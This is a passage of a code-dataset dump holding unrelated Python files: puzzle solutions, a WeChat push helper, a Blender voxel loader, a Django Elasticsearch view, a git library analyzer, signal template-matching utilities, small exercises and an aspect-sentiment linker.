print(cnt * (K // 2) + (cnt // 2) * int(K % 2 != 
0))\n","sub_path":"Python_codes/p02891/s332899749.py","file_name":"s332899749.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"206171796","text":"\r\nimport config\r\nimport requests\r\n\r\n\r\ndef push_to_wechat(text, desp, appToken, uid):\r\n \"\"\"\r\n 通过wxpusher将消息推送到微信\r\n \"\"\"\r\n url = f'http://wxpusher.zjiecode.com/api/send/message'\r\n session = requests.Session()\r\n data = {\r\n \"appToken\": appToken,\r\n \"content\": desp,\r\n \"summary\": text,\r\n \"contentType\": 1,\r\n \"topicIds\": [],\r\n \"uids\": [\r\n uid\r\n ],\r\n }\r\n headers = {\r\n 'Content-Type': 'application/json'\r\n }\r\n resp = session.post(url, json=data, headers=headers)\r\n return resp.json()\r\n\r\n\r\nif __name__ == '__main__':\r\n resp = push_to_wechat(text='test', desp='hi',\r\n appToken='',\r\n uid='')\r\n print(resp)\r\n","sub_path":"utils/serverchan_push.py","file_name":"serverchan_push.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"134866300","text":"from collections import namedtuple\nfrom itertools import combinations, product\n\nplayer = {}\nboss = {}\nEquipment = namedtuple('Equipment', 'cost damage armor')\nweapons = {}\narmors = {'blank': Equipment(0, 0, 0)}\nrings = {'blank': Equipment(0, 0, 0)}\n\ndef player_wins(weapon, armor='blank', ring1='blank', ring2='blank'):\n damage = weapons[weapon].damage + rings[ring1].damage + rings[ring2].damage\n armor = armors[armor].armor + rings[ring1].armor + rings[ring2].armor\n dmg_give = max(damage - boss['Armor'], 1)\n dmg_take = max(boss['Damage'] - armor, 1)\n moves_for_player = (boss['Hit Points'] + dmg_give - 1) // dmg_give\n moves_for_boss = (player['Hit Points'] + dmg_take - 1) // dmg_take\n if moves_for_player <= moves_for_boss:\n return True\n else:\n return False\n\nwith open('Day 21 - input', 'r') as f:\n f.readline()\n for _, line in zip(range(3), f):\n line = line.strip().split(': ')\n player[line[0]] = int(line[-1])\n f.readline()\n f.readline()\n for _, line in zip(range(3), f):\n line = line.strip().split(': ')\n boss[line[0]] = int(line[-1])\n f.readline()\n f.readline()\n for _, line in zip(range(5), f):\n line = line.strip().split()\n weapons[line[0]] = (Equipment(cost=int(line[1]), damage=int(line[2]), armor=int(line[3])))\n f.readline()\n f.readline()\n for _, line in zip(range(5), f):\n line = line.strip().split()\n armors[line[0]] = (Equipment(cost=int(line[1]), damage=int(line[2]), armor=int(line[3])))\n f.readline()\n f.readline()\n for _, line in zip(range(6), f):\n line = line.strip().split()\n rings[line[0] + line[1]] = (Equipment(cost=int(line[2]), damage=int(line[3]), armor=int(line[4])))\n\n highest_cost = 9 + 13 + 25 + 20\n for weapon, armor in product(weapons.keys(), armors.keys()):\n for ring in rings.keys():\n cost = weapons[weapon].cost + armors[armor].cost + rings[ring].cost\n if not player_wins(weapon, armor, ring):\n highest_cost = max(highest_cost, cost)\n for ring1, ring2 in combinations(rings.keys(), 2):\n cost = weapons[weapon].cost + armors[armor].cost + rings[ring1].cost + rings[ring2].cost\n if not player_wins(weapon, armor, ring1, ring2):\n highest_cost = max(highest_cost, cost)\n print(highest_cost)\n","sub_path":"2015/Day 21-2.py","file_name":"Day 21-2.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"361435672","text":"from lxml import html\nimport requests\nimport json\n\n# page = requests.get('https://therun.sk/propozicie#segment-29')\npage = requests.get('https://therun.sk/data/track/segments')\ndata = page.json()\nprint(data)\n\nfolderName = './runProcessing/TheRun/res2019'\nwith open(folderName + '/data.json', 'w', encoding='UTF-8') as outfile:\n json.dump(data, outfile)\n\nprint('DONE')","sub_path":"runProcessing/TheRun/scrapRoute.py","file_name":"scrapRoute.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"500664650","text":"#typedef struct VoxelData {\n#\tint resol[3];\n#\tint interp_type;\n#\tshort file_format;\n#\tshort flag;\n#\tshort extend;\n#\tshort smoked_type;\n#\tshort hair_type;\n#\tshort data_type;\n#\tint _pad;\n#\t\n#\tstruct Object *object; /* for rendering smoke sims */\n#\tfloat int_multiplier;\n#\tint still_frame;\n#\tchar source_path[1024]; /* 1024 = FILE_MAX */\n#\n#\t/* temporary data */\n#\tfloat *dataset;\n#\tint cachedframe;\n#\tint ok;\n#\t\n#} VoxelData;\n\n#import ctypes\nfrom ctypes import *\nimport ctypes\nimport numpy as np\nfrom science import setMaterial\nimport bpy\n\n\nfilevoxout = '/Users/jillnaiman1/Desktop/test1_ytl4_l1en27.bvox'\n\n#Object = bpy.data.objects['Cube']\n\n# done by hand:\n# resol = 512, 512, 512\n# interp_type = 1\n# file_format = 0\n# flag = 0\n# extend = 2\n# hair_type = 0\n# data_type = 0\n# _pad = 0\n# Object = Nothing\n# int_multiplier = 1.0\n# still_frame = 0\n# source_path = b'/Users/jillnaiman1/Desktop/test1_ytl4_l1en27.bvox'\n# dataset = <__main__.LP_c_float object at 0x11dea31e0>\n# cachedframe = 0\n# ok = 1\n\n\n# with code\n# cachedframe = -1\n# ok = 0\n# source_path = b''\n\n\nclass VoxelData(Structure):\n _fields_ = [(\"resol\", c_int*3), # NOTE this really is supposed to be 3 numbers\n (\"interp_type\", c_int),\n (\"file_format\", c_short),\n (\"flag\", c_short),\n (\"extend\", c_short),\n (\"hair_type\", c_short),\n (\"data_type\", c_short),\n (\"_pad\", c_int),\n (\"Object\", c_voidp),\n (\"int_multiplier\", c_float),\n (\"still_frame\", c_int),\n (\"source_path\", c_char*1024), # this is probably wrong\n (\"dataset\", POINTER(c_float)),\n (\"cachedframe\", c_int),\n (\"ok\", c_int)]\n # NOTE!!! 
what to do about *dataset???\n\n\n\nmat_name = 'CubeMat'\ntex_name = 'CubeTex'\n\n# first create but if it does exist\nflagg = True\n# do we have cube?\nfor ob in bpy.data.objects:\n if ob.name == 'Cube':\n flagg = False\n\nif flagg:\n bpy.ops.mesh.primitive_cube_add(radius=1.0)\n\n\n# put it in the center \nbpy.data.objects['Cube'].location = (0,0,0.)\n\n\n# make a material\nmat = bpy.data.materials.new(mat_name)\nmat.type = 'VOLUME'\nmat.volume.density = 0.0 # lower?\nmat.volume.density_scale = 2.0 # upper in the slice plot\nmat.volume.scattering = 1.4\nmat.volume.emission = 0.0\nmat.transparency_method = 'Z_TRANSPARENCY'\n\nsetMaterial(bpy.data.objects['Cube'], mat)\n\n# Create texture from image sequence\nmtex = mat.texture_slots.add()\nmat.active_texture_index = 0\n\n# this should work but it doesnt right now...\ntex = bpy.data.textures.new(tex_name, type = 'VOXEL_DATA')\nmat.active_texture = tex\n\ntex.use_color_ramp = True\n\ntex.voxel_data.file_format = 'BLENDER_VOXEL'\n#tex.voxel_data.file_format = 'BLENDER_VOXEL'\n\ntex.voxel_data.filepath = filevoxout\n\nmat.texture_slots[0].texture_coords = 'ORCO' # generated coords\nmat.texture_slots[0].mapping = 'CUBE' # map to a cube\n\n# NO idea\nts = mat.texture_slots[0]\nts.use_map_density = True\nts.density_factor = 1.0\nts.use_map_emission = True\nts.emission_factor = 1.0\nts.use_map_color_emission = True\nts.emission_color_factor = 1.0\n\n\n\n \n\nfor i in range(3):\n tex.voxel_data.resolution[i] = 512\n\n\n\n\nvdp = ctypes.cast(bpy.data.textures[tex_name].voxel_data.as_pointer(),ctypes.POINTER(VoxelData))\n\nimport yt\nds = yt.load(\"~/data/IsolatedGalaxy/galaxy0030/galaxy0030\")\ncg = ds.covering_grid(4, [0,0,0], (512,512,512))\nrho = np.log10(cg[\"density\"])\nrho = (rho-rho.min())/(rho.max()-rho.min())\nrho = rho.astype(\"float32\").copy()\nrho = np.ascontiguousarray(rho)\narr = (ctypes.c_float * rho.size)()\narr2 = np.ctypeslib.as_array(arr, rho.shape)\narr2[:] = rho.flat[:]\n\nvdp.contents.dataset = ctypes.cast(arr, ctypes.POINTER(ctypes.c_float))\nvdp.contents.ok = 1\nvdp.contents.cachedframe = bpy.context.scene.frame_current\n\nprint (rho.strides)\n","sub_path":"exampleScripts/voxeldata.py","file_name":"voxeldata.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"161258790","text":"from django.db.models.lookups import Lookup\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django_elasticsearch_dsl_drf.constants import ( LOOKUP_FILTER_GEO_DISTANCE,)\n\nfrom django_elasticsearch_dsl_drf.filter_backends import (FilteringFilterBackend, OrderingFilterBackend,CompoundSearchFilterBackend,)\nfrom django_elasticsearch_dsl_drf.viewsets import DocumentViewSet\n\n# Example app models\nfrom elasticapp.documents import PublisherDocument\nfrom elasticapp.serializers import PublisherDocumentSerializer\n\nclass PublisherDocumentView(DocumentViewSet):\n document=PublisherDocument\n serializer_class=PublisherDocumentSerializer\n lookup_field='id'\n filter_backends=[\n FilteringFilterBackend,\n OrderingFilterBackend,\n CompoundSearchFilterBackend\n\n ]\n\n search_fields=(\n 'name',\n 'address',\n 'city',\n 'state_province'\n 'country'\n )\n\n filter_fields={\n 'id': None,\n 'name': 'name.raw',\n 'city': 'city.raw',\n 'state_province': 'state_province.raw',\n 'country': 'country.raw',\n }\n\n ordering_fields = {\n 'id': None,\n 'name': None,\n 'city': None,\n 'country': None,\n }\n\n # Specify default ordering\n ordering = 
('id', 'name',)\n # Define geo-spatial filtering fields\n geo_spatial_filter_fields = {\n 'location': {\n 'lookups': [\n LOOKUP_FILTER_GEO_DISTANCE,\n ],\n },\n }","sub_path":"elasticapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"556583423","text":"import pathlib\nimport os\nimport hashlib as md5\nimport tempfile\nimport shutil\nimport git\nimport stat\nimport uuid\nfrom ui.progress import progress\nfrom language.loader import load as load_language\nfrom language.detect_language import supported_languages\nfrom datetime import datetime\nimport logging\nimport fnmatch\nimport time\n\nmodule_logger = logging.getLogger(\"main.analyze_libraries\")\n\n\nclass AnalyzeLibraries:\n def __init__(self, commit_list, author_emails, basedir, skip, commit_size_limit, file_size_limit, headless=False):\n self.commit_list = commit_list\n self.author_emails = author_emails\n self.basedir = basedir\n self.skip = skip\n self.commit_size_limit = commit_size_limit\n self.file_size_limit = file_size_limit\n self.headless = headless\n\n # Return a dict of commit -> language -> list of libraries\n def get_libraries(self):\n\n res = {}\n commits = _filter_commits_by_author_emails(self.commit_list, self.author_emails)\n if not commits:\n _log_info(\"No commmits found for the authored by selected users\")\n return res\n\n # If we are in headless mode, we don't copy the repo to temp location\n if self.headless:\n tmp_repo_path = self.basedir\n repo = git.Repo(tmp_repo_path)\n else:\n # Before we do anything, copy the repo to a temporary location so that we don't mess with the original repo\n tmp_repo_path = _get_temp_repo_path()\n\n _log_info(\"Copying the repository to a temporary location, this can take a while...\")\n try:\n shutil.copytree(\"%s/.git\" % self.basedir,\n \"%s/.git\" % tmp_repo_path,\n symlinks=True)\n\n except shutil.Error as e:\n module_logger.debug(\"Shutil error messages: {}.\".format(str(e)))\n _log_info(\"Finished copying the repository to\", tmp_repo_path)\n\n # Initialise the next tmp directory as a repo and hard reset, just in case\n repo = git.Repo(tmp_repo_path)\n repo.git.clean('-fd')\n try:\n repo.git.checkout('master')\n except git.exc.GitCommandError as err:\n _log_info(\"Cannot checkout master on repository: \", err)\n\n try:\n repo.git.reset('--hard')\n except git.exc.GitCommandError as err:\n _log_info(\"Cannot reset repository: \", err)\n\n prog = 0\n total = len(commits)\n\n if not self.skip:\n _log_info(\"Skipping is set to False. All commits and files will be evaluated. This may take time.\")\n else:\n _log_info(\"Commit size limit is {} MB and file size limit is {} MB.\".format(\n self.commit_size_limit, self.file_size_limit))\n\n try:\n for commit in commits:\n start = time.time()\n module_logger.debug(\"Current commit hash is {}.\".format(commit.hash))\n libs_in_commit = {}\n files = [os.path.join(tmp_repo_path, x.file_name)\n for x in commit.changed_files]\n\n # if skip is not set to false in args, we may skip certain commits\n # Estimate the summed size of the changed files in the commit. 
If changed files sum more than 10 MB\n # or there are no changed files we recognize, we skip the commit (don't check out)\n est_size = _estimate_changed_file_size(files)\n module_logger.debug(\"Changed file list is {} MBs.\".format(est_size))\n module_logger.debug(\"Skip is set to {}.\".format(self.skip))\n if not self.skip or ((est_size < self.commit_size_limit) and _should_we_check_out(files)):\n\n module_logger.debug(\"Checking out and analyzing commit.\")\n co_start = time.time()\n try:\n repo.git.checkout(commit.hash, force=True)\n except Exception:\n continue\n co_end = time.time()\n module_logger.debug(\"Checking out took {0:.6f} seconds.\".format(co_end - co_start))\n\n else:\n module_logger.debug(\"Skipping commit.\")\n prog += 1\n progress(prog, total, 'Analyzing libraries')\n continue\n\n for lang_root, extensions in supported_languages.items():\n # we have extensions now, filter the list to only files with those extensions\n lang_files = list(filter(lambda x: (pathlib.Path(\n x).suffix[1:].lower() in extensions), files))\n if lang_files:\n module_logger.debug(\"Current language is {}, and extensions are{}\".format(lang_root,\n extensions))\n # if we go to this point, there were files modified in the language we support\n # check out the commit in our temporary branch\n\n # we need to filter again for files, that got deleted during the checkout\n # we also filter out tiles, which are larger than 2 MB to speed up the process\n if self.skip:\n filter_func = (lambda x: os.path.isfile(x) and os.stat(x).st_size\n < self.file_size_limit * (1024**2))\n else:\n filter_func = (lambda x: os.path.isfile(x))\n\n lang_files_filtered = list(filter(filter_func, lang_files))\n\n total_size = sum(os.stat(f).st_size for f in lang_files_filtered)\n module_logger.debug(\"The number of files in lang_files_filtered\"\n \" is {0}, the total size is {1:.2f} MB\".\n format(\n len(lang_files_filtered), total_size / (1024 ** 2)\n ))\n # now we need to run regex for imports for every single of such file\n # Load the language plugin that is responsible for parsing those files for libraries used\n parser = load_language(lang_root)\n # Only parse libraries if we support the current language\n if parser:\n mapped_libs = parser.extract_libraries(lang_files_filtered).items()\n for lang, libraries in mapped_libs:\n if len(libraries) == 0:\n continue\n if lang not in libs_in_commit.keys():\n libs_in_commit[lang] = []\n libs_in_commit[lang].extend(libraries)\n\n prog += 1\n end = time.time()\n module_logger.debug(\"Time spent processing commit {0} was {1:.4f} seconds.\".format(\n commit.hash, end-start))\n\n progress(prog, total, 'Analyzing libraries')\n\n if libs_in_commit:\n res[commit.hash] = libs_in_commit\n\n except (Exception, KeyboardInterrupt) as err:\n # make sure to clean up the tmp folder before dying\n # if we are in headless mode, it is not necessary to cleanup,\n # the repo will be deleted later\n if not self.headless:\n _cleanup(tmp_repo_path)\n\n raise err\n\n if not self.headless:\n _cleanup(tmp_repo_path)\n\n return res\n\n\ndef _should_we_check_out(file_list):\n\n for lang, extensions in supported_languages.items():\n lang_files = list(filter(lambda x: (pathlib.Path(x).suffix[1:].lower() in extensions), file_list))\n if lang_files:\n return True\n return False\n\n\ndef _estimate_changed_file_size(file_list):\n total_size = 0\n for file in file_list:\n try:\n total_size += os.stat(file).st_size / (1024**2)\n except (FileNotFoundError, Exception) as e:\n module_logger.debug(\"Error when getting 
file size {}\".format(str(e)))\n continue\n return total_size\n\n\ndef _remove_readonly(func, path, _):\n\n \"\"\"Clear the readonly bit and reattempt the removal\"\"\"\n os.chmod(path, stat.S_IWRITE)\n func(path)\n\n\ndef _cleanup(tmp_repo_path):\n _log_info(\"Deleting\", tmp_repo_path)\n try:\n shutil.rmtree(tmp_repo_path, onerror=_remove_readonly)\n except (PermissionError, NotADirectoryError, Exception) as e:\n _log_info(\"Error when deleting {}\".format(str(e)))\n\n\n# Return only commits authored by provided obfuscated_author_emails\ndef _filter_commits_by_author_emails(commit_list, author_emails):\n _log_info(\"Filtering commits by emails: \", author_emails)\n return list(filter(lambda x: x.author_email in author_emails, commit_list))\n\n\ndef _get_temp_repo_path():\n return os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))\n\n\ndef _log_info(message, *argv):\n timed_message = \"[%s] %s\" % (datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"), message)\n print(timed_message, *argv)\n","sub_path":"src/analyze_libraries.py","file_name":"analyze_libraries.py","file_ext":"py","file_size_in_byte":9425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"471398482","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\nfrom scipy.signal import find_peaks\nfrom scipy.spatial.distance import euclidean\n#import fastdtw\n#from dtaidistance import dtw\n\n\n# %% some normalization functions\ndef normalized_rms(y, y_hat):\n v_y = np.var(y)\n if v_y == 0:\n v_y = 1\n norm_res = np.sqrt(mean_squared_error(y, y_hat) / v_y)\n return norm_res\n\n\ndef center(x: np.ndarray):\n y = x - np.mean(x)\n return y\n\n\ndef center_scale(x: np.ndarray):\n xc = center(x)\n x_std = np.std(xc, ddof=1)\n if x_std == 0 or np.isnan(x_std):\n x_std = 1\n\n x_cs = xc / x_std\n return x_cs\n\n\ndef normalize_range(x: np.ndarray, new_min: float = 0.0, new_max: float = 1.0):\n x_min = np.min(x)\n x_max = np.max(x)\n d = x_max - x_min\n\n if d == 0:\n d = 1\n\n xn = new_min + (x-x_min)/d * (new_max-new_min)\n\n return xn\n\n\n# %% similarity measures\ndef pearson_correlation_coefficient(x: np.ndarray, y: np.ndarray):\n x_cs = center_scale(x)\n y_cs = center_scale(y)\n c = np.dot(x_cs, y_cs) / len(x_cs)\n\n return c\n\n\ndef pearson_center(x: np.ndarray, y: np.ndarray):\n x_cs = center(x)\n y_cs = center(y)\n c = np.dot(x_cs, y_cs) / len(x_cs)\n\n return c\n\n\n\ndef normalized_euclidean_distance(x, y):\n d = np.linalg.norm(x - y)\n xn = np.linalg.norm(x)\n yn = np.linalg.norm(y)\n md = np.maximum(xn, yn)\n\n if md == 0.0:\n md = 1\n d /= md\n\n return d\n\n\ndef distance_by_dynamic_time_warping(x, y):\n distance, path = fastdtw.fastdtw(x, y, dist=euclidean)\n\n return distance, path\n\n\ndef distance_by_dynamic_time_warping2(x, y):\n distance = dtw.distance_fast(x, y)\n return distance\n\n\n# %%\ndef subtract_polynomial_model(y: np.ndarray, degree: int = 1):\n \"\"\"\n example:\n M = 100\n mu, sigma = 1, 0.3\n x = np.linspace(0, 1, M)\n y = np.random.normal(mu, sigma, M)\n degree = 2\n y_hat = subtract_polynomial_model(y, degree=degree)\n plt.scatter(x, y, color='navy', s=30, marker='o', label=\"data points\")\n plt.plot(x, y_hat, color='red', linewidth=2, label=\"degree %d\" % degree)\n plt.grid()\n plt.show()\n \"\"\"\n m = len(y)\n x = np.linspace(-1.0, 1.0, m)\n c = np.polyfit(x, y, degree)\n p1 = np.poly1d(c)\n y_hat = p1(x)\n r = y - y_hat\n return r, y_hat\n\n\n# %%\ndef template_matching_1d(template: np.ndarray, y: 
np.ndarray, sim_method: str = 'pearson',\n preprocesssing_method: str = 'no', normalize: bool = True):\n m = len(template)\n n = len(y)\n c = np.zeros((n,))\n for i in np.arange(0, n):\n x1 = i\n x2 = np.minimum(i + m, n)\n yi = y[x1:x2]\n t = template[:(x2-x1)]\n\n if len(t) > 5:\n if preprocesssing_method == 'subtract_quad':\n t, _ = subtract_polynomial_model(t, degree=2)\n yi, _ = subtract_polynomial_model(yi, degree=2)\n\n if preprocesssing_method == 'subtract_gradient':\n t, _ = subtract_polynomial_model(t, degree=1)\n yi, _ = subtract_polynomial_model(yi, degree=1)\n\n if preprocesssing_method == 'subtract_kub':\n t, _ = subtract_polynomial_model(t, degree=3)\n yi, _ = subtract_polynomial_model(yi, degree=3)\n\n\n if sim_method == 'pearson':\n pc = pearson_correlation_coefficient(t, yi)\n c[i] = pc\n\n if sim_method == 'conv':\n c[i] = np.abs(np.dot(t, yi))\n\n if sim_method == 'euclidean':\n nd = 1.0 - normalized_euclidean_distance(t, yi)\n c[i] = nd # np.maximum(np.minimum(1.0, nd), 0.0)\n\n if sim_method == 'dtw':\n d, _ = distance_by_dynamic_time_warping(t, yi)\n c[i] = 1.0 - d\n\n if sim_method == 'dtw2':\n d = distance_by_dynamic_time_warping2(t, yi)\n c[i] = 1.0 - d\n\n if normalize:\n c = normalize_range(c)\n\n return c\n\n\n# %%\n\ndef detect_peaks(y: np.ndarray, min_level: float = 0.8, max_level: float = 1.01, min_dist: int = 10):\n #peaks, _ = find_peaks(y, height=(min_level, max_level), distance=min_dist)\n\n peaks, _ = find_peaks(y, height=min_level, distance=min_dist)\n #print(\"detect peaks\",_)\n return peaks\n","sub_path":"plugins/mininghelper.py","file_name":"mininghelper.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"62120119","text":"from random import randint\n\n\"\"\"\nPEDRA x PAPEL : PAPEL\nPEDRA x TESOURA : PEDRA\n\nPAPEL x PEDRA : PAPEL\nPAPEL x TESOURA : TESOURA\n\nTESOURA x PEDRA : PEDRA\nTESOURA x PAPEL : TESOURA\n\"\"\"\n\ndef msgVence(op, jogador):\n\tprint(op + \"\\n\" + jogador + \" vence!\")\n\nlis = ('PEDRA', 'PAPEL', 'TESOURA')\n\nprint('''Escolha\n[0]: PEDRA\n[1]: PAPEL\n[2]: TESOURA''')\n# print()\nop1 = int(input('Escolher: ')) % 3\njogador1 = lis[op1]\n\nop2 = randint(0, 2)\nif op1 == op2:\n\top2 += 1\n\top2 %= 3\n\ncomputador = lis[op2]\n\nprint('\\n{} x {} : '.format(jogador1, computador), end='')\n\nif computador == 'PEDRA':\n\tif jogador1 == 'PAPEL':\n\t\tmsgVence(\"PAPEL\", \"jogador1\")\n\telse:\n\t\tmsgVence(\"PEDRA\", \"computador\")\nelif computador == \"PAPEL\":\n\tif jogador1 == 'PEDRA':\n\t\tmsgVence(\"PAPEL\", \"computador\")\n\telse:\n\t\tmsgVence(\"TESOURA\", \"jogador1\")\nelif jogador1 == \"PEDRA\":\n\tmsgVence(\"PEDRA\", \"jogador1\")\nelse:\n\tmsgVence(\"TESOURA\", \"computador\")\n\n\ninput()","sub_path":"curso-em-video/mundo2/tupla.py","file_name":"tupla.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"204408967","text":"class Node:\n def __init__(self):\n self.data = None\n self.next = None\n\nclass CircularLinkedList:\n def __init__(self):\n self.tail = None\n self.cur = None\n self.before = None\n self.numOfData = 0\n \n def LInsert(self, data):\n newNode = Node()\n newNode.data = data\n\n if self.tail is None:\n self.tail = newNode\n newNode.next = newNode\n else:\n newNode.next = self.tail.next\n self.tail.next = newNode\n self.tail = newNode\n self.numOfData += 1\n \n def LInsertFront(self, data):\n newNode = Node()\n 
newNode.data = data\n\n if self.tail is None:\n self.tail = newNode\n newNode.next = newNode\n else:\n newNode.next = self.tail.next\n self.tail.next = newNode\n self.numOfData += 1\n \n def LFirst(self):\n if self.tail is None:\n return False, -1\n \n self.before = self.tail\n self.cur = self.tail.next\n\n return True, self.cur.data\n \n def LNext(self):\n if self.tail is None:\n return False, -1\n \n self.before = self.cur\n self.cur = self.cur.next\n\n return True, self.cur.data\n \n def LRemove(self):\n rpos = Node()\n rdata = rpos.data\n\n if rpos == self.tail:\n if self.tail == self.tail.next:\n self.tail = None\n else:\n self.tail = self.before\n \n self.before.next = self.cur.next\n self.cur = self.before\n\n self.numOfData -= 1\n return rdata\n \n def LCount(self):\n return self.numOfData\n","sub_path":"codes/Question5_1/Python/CircularLinkedListModule.py","file_name":"CircularLinkedListModule.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"638783982","text":"# Uses python3\nimport sys\n\ndef get_change(m):\n #write your code here\n change = 0\n if m < 10 and m < 5:\n return (m)\n elif m < 10 and m > 5:\n mid = m%5\n return (1+mid)\n else:\n ten_coin = m//10\n mid = m%10\n if mid < 5:\n return (ten_coin+mid)\n else:\n return (ten_coin+mid-4)\n\n\n\n\n\nif __name__ == '__main__':\n m = int(input())\n print(get_change(m))\n","sub_path":"week3_greedy_algorithms/1_money_change/change.py","file_name":"change.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"629624042","text":"# importing nltk libraries\nimport gensim.models\nimport src\nfrom nltk.tokenize import word_tokenize\nfrom aspect_sentiment_analyzer.chunklib import BigramChunker\nfrom nltk.corpus import conll2000\nfrom nltk.tag import pos_tag\nfrom nltk.tokenize import sent_tokenize\nimport pickle\nfrom gensim import utils, matutils\nfrom numpy import dot\nfrom word2vec_model.cluster_words import Kmean_cluster_tagging\nfrom word2vec_model.cluster_words import Kmean_cluster_food_tagging\n\nclass context_aspect_linker():\n\n def __init__(self):\n print('loading word2vec model')\n self.model = gensim.models.Word2Vec.load(src.RA + '/data/models/model_updatable_unigram.p')\n print('word2vec model loaded')\n with open(src.RA + '/data/models/aspect_cluster_centers_new.p','rb') as f:\n self.aspect_category_center_mapping = pickle.load(f)\n\n self.aspect_category_center_mapping['food_category'].append(self.model['food'])\n self.aspect_category_center_mapping['service_category'].append(self.model['service'])\n self.aspect_category_center_mapping['misc_category'].append(self.model['quantity'])\n self.food_list ,self.ambience_list,self.cost_list,self.service_list= pickle.load(open(src.RA + \"/data/models/aspects_cluster_centers.p\",\"rb\"))\n self.food_list.append(self.model['food'])\n self.ambience_list.append(self.model['ambience'])\n self.cost_list.append(self.model['cost'])\n self.service_list.append(self.model['service'])\n self.food_entity, self.non_food_list = pickle.load(open(src.RA + \"/data/models/food_classifier_model.p\",\"rb\"))\n\n\n def context_split(self,sentence):\n words = word_tokenize(sentence.lower())\n tagged_words = pos_tag(words)\n sentence_length = len(words)\n similarity_list = []\n index_list_tagged = []\n context_tagged = []\n max = 0\n for word in words:\n try:\n print(word,self.model.similarity('but',word))\n 
similarity = self.model.similarity('but',word)\n similarity_list.append(similarity)\n if max < similarity:\n max = similarity\n except Exception as e:\n similarity_list.append(0)\n #normalised_list = similarity_list/max\n for i in range (len(words)):\n if tagged_words[i][1] == 'CC':\n index_list_tagged.append(i)\n index_list_tagged.append(sentence_length)\n var = 0\n for index in index_list_tagged:\n context_tagged.append(words[var:index])\n var = index + 1\n\n def get_maximum_similarity(self, word, aspect_list):\n max_similarity = 0\n for centre in aspect_list:\n similarity = dot(matutils.unitvec(self.model[word]), matutils.unitvec(centre))\n if max_similarity < similarity:\n max_similarity = similarity\n return max_similarity\n\n def test_aspect(self, test):\n # print(test)\n similarity_sum_food = 0\n similarity_sum_cost = 0\n similarity_sum_ambience = 0\n similarity_sum_service = 0\n for word in test:\n # print(word)\n try:\n similarity_sum_food += self.get_maximum_similarity(word, self.food_list)\n similarity_sum_ambience += self.get_maximum_similarity(word, self.ambience_list)\n similarity_sum_service += self.get_maximum_similarity(word, self.service_list)\n similarity_sum_cost += self.get_maximum_similarity(word, self.cost_list)\n except Exception as e:\n # print(e)\n pass\n # print('food :', similarity_sum_food)\n # print('ambience :', similarity_sum_ambience)\n # print('cost :', similarity_sum_cost)\n # print('service :', similarity_sum_service)\n aspect_list = [similarity_sum_ambience, similarity_sum_service, similarity_sum_cost, similarity_sum_food]\n tag_list = ['ambience', 'service', 'cost', 'food']\n tag_index = aspect_list.index(max(aspect_list))\n return tag_list[tag_index]\n\n def get_multiple_aspect_categories(self,noun_phrases):\n word_aspect_category = {}\n for words in noun_phrases:\n if len(words)>0:\n temp={}\n for word in words:\n # print(word)\n temp={}\n try:\n temp['food_category'] = self.get_maximum_similarity(word, self.aspect_category_center_mapping['food_category'])\n temp['ambience_category'] = self.get_maximum_similarity(word, self.aspect_category_center_mapping['ambience_category'])\n temp['service_category'] = self.get_maximum_similarity(word, self.aspect_category_center_mapping['service_category'])\n temp['cost_category'] = self.get_maximum_similarity(word, self.aspect_category_center_mapping['cost_category'])\n temp['drinks_category'] = self.get_maximum_similarity(word, self.aspect_category_center_mapping['drinks_category'])\n temp['misc_category'] = self.get_maximum_similarity(word, self.aspect_category_center_mapping['misc_category'])\n category = max(temp,key=temp.get)\n word_aspect_category[word]=category\n except Exception as e:\n pass\n # print(e)\n return word_aspect_category\n\n def get_multiple_tags(self, noun_phrases):\n words = []\n try:\n for i in range(len(noun_phrases)):\n phrase = noun_phrases[i]\n for j in range(len(phrase)):\n words.append(noun_phrases[i][j])\n except Exception as e:\n pass\n tag = self.get_multiple_aspect_categories(noun_phrases)\n return tag, words\n\n def get_tag(self, noun_phrases):\n try:\n words = []\n for i in range(len(noun_phrases)):\n phrase = noun_phrases[i]\n for j in range(len(phrase)):\n words.append(noun_phrases[i][j])\n except Exception as e:\n pass\n tag = self.test_aspect(words)\n return tag, words\n\n def get_phrase_tag(self, noun_phrases):\n phrase_tag = []\n try:\n for i in range(len(noun_phrases)):\n phrase = noun_phrases[i]\n words = []\n for j in range(len(phrase)):\n 
